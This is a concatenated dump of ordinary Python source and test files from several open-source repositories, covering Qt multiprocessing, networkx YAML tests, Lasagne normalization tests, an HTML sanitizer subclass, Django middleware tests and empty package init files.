raise Exception("Must create QApplication before starting QtProcess, or use QtProcess(processRequests=False)")
Process.__init__(self, **kwds)
self.startEventTimer()
def startEventTimer(self):
from ..Qt import QtCore ## avoid module-level import to keep bootstrap snappy.
self.timer = QtCore.QTimer()
if self._processRequests:
self.startRequestProcessing()
def startRequestProcessing(self, interval=0.01):
"""Start listening for requests coming from the child process.
This allows signals to be connected from the child process to the parent.
"""
self.timer.timeout.connect(self.processRequests)
self.timer.start(interval*1000)
def stopRequestProcessing(self):
self.timer.stop()
def processRequests(self):
try:
Process.processRequests(self)
except ClosedError:
self.timer.stop()
def startQtEventLoop(name, port, authkey, ppid, debug=False):
if debug:
import os
cprint.cout(debug, '[%d] connecting to server at port localhost:%d, authkey=%s..\n' % (os.getpid(), port, repr(authkey)), -1)
conn = multiprocessing.connection.Client(('localhost', int(port)), authkey=authkey)
if debug:
cprint.cout(debug, '[%d] connected; starting remote proxy.\n' % os.getpid(), -1)
from ..Qt import QtGui, QtCore
app = QtGui.QApplication.instance()
#print app
if app is None:
app = QtGui.QApplication([])
app.setQuitOnLastWindowClosed(False) ## generally we want the event loop to stay open
## until it is explicitly closed by the parent process.
global HANDLER
HANDLER = RemoteQtEventHandler(conn, name, ppid, debug=debug)
HANDLER.startEventTimer()
app.exec_()
import threading
class FileForwarder(threading.Thread):
"""
Background thread that forwards data from one pipe to another.
This is used to catch data from stdout/stderr of the child process
and print it back out to stdout/stderr. We need this because this
bug: http://bugs.python.org/issue3905 _requires_ us to catch
stdout/stderr.
*output* may be a file or 'stdout' or 'stderr'. In the latter cases,
sys.stdout/stderr are retrieved once for every line that is output,
which ensures that the correct behavior is achieved even if
sys.stdout/stderr are replaced at runtime.
"""
def __init__(self, input, output, color):
threading.Thread.__init__(self)
self.input = input
self.output = output
self.lock = threading.Lock()
self.daemon = True
self.color = color
self.start()
def run(self):
if self.output == 'stdout' and self.color is not False:
while True:
line = self.input.readline()
with self.lock:
cprint.cout(self.color, line, -1)
elif self.output == 'stderr' and self.color is not False:
while True:
line = self.input.readline()
with self.lock:
cprint.cerr(self.color, line, -1)
else:
if isinstance(self.output, str):
self.output = getattr(sys, self.output)
while True:
line = self.input.readline()
with self.lock:
try:
self.output.write(line)
except TypeError:
self.output.write(line.decode())
|
ftomassetti/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyUnresolvedReferencesInspection/superType.py
|
83
|
class A1(object):
def method1(self):
pass
class A2(A1):
def method2(self):
print 'm2'
class B(A2):
def method2(self):
super(A2, self).<warning descr="Unresolved attribute reference 'method2' for class 'A1'">method2</warning>() #method2 should be highlighted as unresolved.
B().method2()
|
brycepg/cave-dweller
|
refs/heads/master
|
tests/test_bench_gen_map.py
|
1
|
import unittest
import random
from cave_dweller.game import Game
from cave_dweller.gen_map import gen_map as c_gen_map
from cave_dweller.gen_map import generate_obstacle_map
from .test_gen_map import zero_map, obs_map
def test_benchmark_map(benchmark):
# One time only
result = benchmark.pedantic(c_gen_map, args=(0, 0, 0), rounds=50)
#assert result == zero_map
#def test_c_gen_map(benchmark):
# result = benchmark.pedantic(c_gen_map, args=(0, 0, 0), rounds=50)
# assert result == zero_map
def test_benchmark_obstacle_map(benchmark):
# One time only
result = benchmark.pedantic(generate_obstacle_map, args=(zero_map, 96), rounds=50)
#assert result == obs_map
|
MiLk/ansible-modules-core
|
refs/heads/devel
|
source_control/__init__.py
|
12133432
| |
bretlowery/snakr
|
refs/heads/master
|
lib/django/conf/locale/zh_Hans/__init__.py
|
12133432
| |
shacker/django
|
refs/heads/master
|
tests/view_tests/tests/__init__.py
|
12133432
| |
wangxiangyu/horizon
|
refs/heads/stable/kilo
|
openstack_dashboard/dashboards/project/data_processing/__init__.py
|
12133432
| |
kartikdhar/djangotest
|
refs/heads/master
|
virt1/lib/python2.7/site-packages/django/contrib/admin/migrations/__init__.py
|
12133432
| |
HyperloopTeam/FullOpenMDAO
|
refs/heads/master
|
lib/python2.7/site-packages/networkx-1.9.1-py2.7.egg/networkx/readwrite/tests/test_yaml.py
|
40
|
"""
Unit tests for yaml.
"""
import os,tempfile
from nose import SkipTest
from nose.tools import assert_equal
import networkx as nx
from networkx.testing import assert_edges_equal, assert_nodes_equal
class TestYaml(object):
@classmethod
def setupClass(cls):
global yaml
try:
import yaml
except ImportError:
raise SkipTest('yaml not available.')
def setUp(self):
self.build_graphs()
def build_graphs(self):
self.G = nx.Graph(name="test")
e = [('a','b'),('b','c'),('c','d'),('d','e'),('e','f'),('a','f')]
self.G.add_edges_from(e)
self.G.add_node('g')
self.DG = nx.DiGraph(self.G)
self.MG = nx.MultiGraph()
self.MG.add_weighted_edges_from([(1,2,5),(1,2,5),(1,2,1),(3,3,42)])
def assert_equal(self, G, data=False):
(fd, fname) = tempfile.mkstemp()
nx.write_yaml(G, fname)
Gin = nx.read_yaml(fname);
assert_nodes_equal(G.nodes(), Gin.nodes())
assert_edges_equal(G.edges(data=data), Gin.edges(data=data))
os.close(fd)
os.unlink(fname)
def testUndirected(self):
self.assert_equal(self.G, False)
def testDirected(self):
self.assert_equal(self.DG, False)
def testMultiGraph(self):
self.assert_equal(self.MG, True)
|
ovresko/erpnext
|
refs/heads/master
|
erpnext/education/doctype/grading_scale/test_grading_scale.py
|
47
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
# test_records = frappe.get_test_records('Grading Scale')
class TestGradingScale(unittest.TestCase):
pass
|
dnuffer/Lasagne
|
refs/heads/master
|
lasagne/tests/layers/test_normalization.py
|
3
|
# -*- coding: utf-8 -*-
"""
This file contains code from pylearn2, which is covered by the following
license:
Copyright (c) 2011--2014, Université de Montréal
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import numpy as np
import pytest
import theano
import lasagne
def ground_truth_normalizer(c01b, k, n, alpha, beta):
out = np.zeros(c01b.shape)
for r in range(out.shape[1]):
for c in range(out.shape[2]):
for x in range(out.shape[3]):
out[:, r, c, x] = ground_truth_normalize_row(
row=c01b[:, r, c, x],
k=k, n=n, alpha=alpha, beta=beta)
return out
def ground_truth_normalize_row(row, k, n, alpha, beta):
assert row.ndim == 1
out = np.zeros(row.shape)
for i in range(row.shape[0]):
s = k
tot = 0
for j in range(max(0, i-n//2), min(row.shape[0], i+n//2+1)):
tot += 1
sq = row[j] ** 2.
assert sq > 0.
assert s >= k
assert alpha > 0.
s += alpha * sq
assert s >= k
assert tot <= n
assert s >= k
s = s ** beta
out[i] = row[i] / s
return out
class TestLocalResponseNormalization2DLayer:
@pytest.fixture
def rng(self):
return np.random.RandomState([2013, 2])
@pytest.fixture
def input_data(self, input_layer, rng):
return rng.randn(*input_layer.shape).astype(theano.config.floatX)
@pytest.fixture
def input_layer(self):
from lasagne.layers.input import InputLayer
channels = 15
rows = 3
cols = 4
batch_size = 2
shape = (batch_size, channels, rows, cols)
return InputLayer(shape)
@pytest.fixture
def layer(self, input_layer):
from lasagne.layers.normalization import\
LocalResponseNormalization2DLayer
layer = LocalResponseNormalization2DLayer(input_layer,
alpha=1.5,
k=2,
beta=0.75,
n=5)
return layer
def test_get_params(self, layer):
assert len(layer.get_params()) == 0
def test_get_bias_params(self, layer):
assert len(layer.get_bias_params()) == 0
def test_normalization(self, input_data, input_layer, layer):
X = input_layer.input_var
lrn = theano.function([X], layer.get_output(X))
out = lrn(input_data)
# ground_truth_normalizer assumes c01b
input_data_c01b = input_data.transpose([1, 2, 3, 0])
ground_out = ground_truth_normalizer(input_data_c01b,
n=layer.n, k=layer.k,
alpha=layer.alpha,
beta=layer.beta)
ground_out = np.transpose(ground_out, [3, 0, 1, 2])
assert out.shape == ground_out.shape
assert np.allclose(out, ground_out)
|
SmithsonianEnterprises/djangocms-text-ckeditor
|
refs/heads/master
|
djangocms_text_ckeditor/sanitizer.py
|
4
|
from html5lib import sanitizer
class AllowTokenParser():
def parse(self, attribute, val):
raise NotImplementedError
class TextSanitizer(sanitizer.HTMLSanitizer):
allow_token_parsers = []
def allowed_token(self, token, token_type):
data_found = False
allowed_attributes = sanitizer.HTMLSanitizer.allowed_attributes
allowed_attributes_len = len(allowed_attributes)
for data in token['data']:
for allow_token_parser in self.allow_token_parsers:
if allow_token_parser().parse(data[0], data[1]) and data[0] not in allowed_attributes:
sanitizer.HTMLSanitizer.allowed_attributes.append(data[0])
data_found = True
allowed_token_res = super(TextSanitizer, self).allowed_token(token, token_type)
if data_found:
old_allowed_attributes = allowed_attributes[0:allowed_attributes_len]
sanitizer.HTMLSanitizer.allowed_attributes = old_allowed_attributes
return allowed_token_res
|
trezorg/django
|
refs/heads/master
|
tests/modeltests/model_inheritance_same_model_name/models.py
|
103
|
"""
XX. Model inheritance
Model inheritance across apps can result in models with the same name resulting
in the need for an %(app_label)s format string. This app specifically tests
this feature by redefining the Copy model from model_inheritance/models.py
"""
from django.db import models
from modeltests.model_inheritance.models import NamedURL
#
# Abstract base classes with related models
#
class Copy(NamedURL):
content = models.TextField()
def __unicode__(self):
return self.content
|
crdoconnor/olympia
|
refs/heads/master
|
apps/amo/tests/test_middleware.py
|
11
|
# -*- coding: utf-8 -*-
from django import http, test
from django.conf import settings
from django.test.client import RequestFactory
import pytest
from commonware.middleware import ScrubRequestOnException
from mock import Mock, patch
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo.tests
from amo.middleware import NoAddonsMiddleware, NoVarySessionMiddleware
from amo.urlresolvers import reverse
from zadmin.models import Config
pytestmark = pytest.mark.django_db
class TestMiddleware(amo.tests.TestCase):
def test_no_vary_cookie(self):
# We don't break good usage of Vary.
response = test.Client().get('/')
eq_(response['Vary'], 'Accept-Language, User-Agent, X-Mobile')
# But we do prevent Vary: Cookie.
response = test.Client().get('/', follow=True)
eq_(response['Vary'], 'X-Mobile, User-Agent')
@patch('django.contrib.sessions.middleware.'
'SessionMiddleware.process_request')
def test_session_not_used_api(self, process_request):
req = RequestFactory().get('/')
req.API = True
NoVarySessionMiddleware().process_request(req)
assert not process_request.called
@patch('django.contrib.sessions.middleware.'
'SessionMiddleware.process_request')
def test_session_not_used(self, process_request):
req = RequestFactory().get('/')
NoVarySessionMiddleware().process_request(req)
assert process_request.called
def test_redirect_with_unicode_get():
response = test.Client().get(
'/da/firefox/addon/5457?from=/da/firefox/'
'addon/5457%3Fadvancedsearch%3D1&lang=ja&utm_source=Google+%E3'
'%83%90%E3%82%BA&utm_medium=twitter&utm_term=Google+%E3%83%90%'
'E3%82%BA')
eq_(response.status_code, 301)
assert 'utm_term=Google+%E3%83%90%E3%82%BA' in response['Location']
def test_source_with_wrong_unicode_get():
# The following url is a string (bytes), not unicode.
response = test.Client().get('/firefox/collections/mozmj/autumn/'
'?source=firefoxsocialmedia\x14\x85')
eq_(response.status_code, 301)
assert response['Location'].endswith('?source=firefoxsocialmedia%14')
def test_trailing_slash_middleware():
response = test.Client().get(u'/en-US/about/?xxx=\xc3')
eq_(response.status_code, 301)
assert response['Location'].endswith('/en-US/about?xxx=%C3%83')
class AdminMessageTest(amo.tests.TestCase):
def test_message(self):
c = Config.objects.create(key='site_notice', value='ET Sighted.')
r = self.client.get(reverse('home'), follow=True)
doc = pq(r.content)
eq_(doc('#site-notice').text(), 'ET Sighted.')
c.delete()
r = self.client.get(reverse('home'), follow=True)
doc = pq(r.content)
eq_(len(doc('#site-notice')), 0)
def test_hide_password_middleware():
request = RequestFactory().post('/', dict(x=1, password=2, password2=2))
request.POST._mutable = False
ScrubRequestOnException().process_exception(request, Exception())
eq_(request.POST['x'], '1')
eq_(request.POST['password'], '******')
eq_(request.POST['password2'], '******')
class TestNoAddonsMiddleware(amo.tests.TestCase):
@patch('amo.middleware.ViewMiddleware.get_name')
def process(self, name, get_name):
get_name.return_value = name
request = RequestFactory().get('/')
view = Mock()
return NoAddonsMiddleware().process_view(request, view, [], {})
@patch.object(settings, 'NO_ADDONS_MODULES',
('some.addons',))
def test_middleware(self):
self.assertRaises(http.Http404, self.process, 'some.addons')
self.assertRaises(http.Http404, self.process, 'some.addons.thingy')
assert not self.process('something.else')
|
Atilla106/members.atilla.org
|
refs/heads/dev
|
network/forms/__init__.py
|
12133432
| |
admed/molgears
|
refs/heads/master
|
templates/myaccount/__init__.py
|
12133432
| |
lmregus/Portfolio
|
refs/heads/master
|
python/design_patterns/env/lib/python3.7/site-packages/IPython/terminal/tests/__init__.py
|
12133432
| |
wbtuomela/mezzanine
|
refs/heads/master
|
mezzanine/project_template/project_name/__init__.py
|
12133432
| |
osen000/python_task
|
refs/heads/master
|
test/__init__.py
|
12133432
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.